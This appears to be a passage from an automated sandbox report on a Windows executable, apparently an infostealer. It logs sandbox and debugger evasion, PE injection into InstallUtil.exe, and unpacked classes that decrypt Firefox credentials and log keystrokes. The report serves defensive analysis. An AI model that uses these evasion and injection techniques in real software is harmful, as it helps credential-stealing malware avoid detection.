                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597062Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596953Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596843Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596734Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596625Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596515Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596406Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596297Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596187Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596078Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595968Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595640Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595422Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595093Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594547Jump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeWindow / User API: threadDelayed 8576Jump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeWindow / User API: threadDelayed 1255Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 1670Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 8186Jump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe TID: 6380Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exe TID: 6380Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -23980767295822402s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7696Thread sleep count: 1670 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -599867s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7696Thread sleep count: 8186 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -599750s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -599640s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -599531s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -599421s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -599312s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -599203s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -599077s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -598968s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -598851s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -598734s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -598625s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -598504s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -598375s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -598265s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -598156s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -598047s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -597937s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -597827s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -597718s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -597609s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -597500s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -597390s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -597281s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -597170s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -597062s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -596953s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -596843s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -596734s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -596625s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -596515s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -596406s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -596297s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -596187s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -596078s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -595968s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -595859s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -595750s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -595640s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -595531s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -595422s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -595312s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -595203s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -595093s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -594984s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -594875s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -594765s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -594656s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692Thread sleep time: -594547s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599867Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599640Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599421Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599077Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598968Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598851Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598734Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598625Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598504Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598375Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598265Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598156Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598047Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597937Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597827Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597718Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597609Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597500Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597390Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597281Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597170Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597062Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596953Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596843Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596734Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596625Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596515Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596406Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596297Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596187Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596078Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595968Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595640Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595422Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595093Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594547Jump to behavior
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2383848177.0000000004B30000.00000004.08000000.00040000.00000000.sdmp, pbCN4g6sN5.exe, 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VBoxTray
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1220104579GSOFTWARE\VMware, Inc.\VMware VGAuth
                    Source: InstallUtil.exe, 00000005.00000002.2901449458.0000000000F09000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_00A1B51C CheckRemoteDebuggerPresent,0_2_00A1B51C
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    .NET source code references suspicious native API functions
                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, COVID19.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 444000Jump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 446000Jump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: C8E008Jump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Users\user\Desktop\pbCN4g6sN5.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
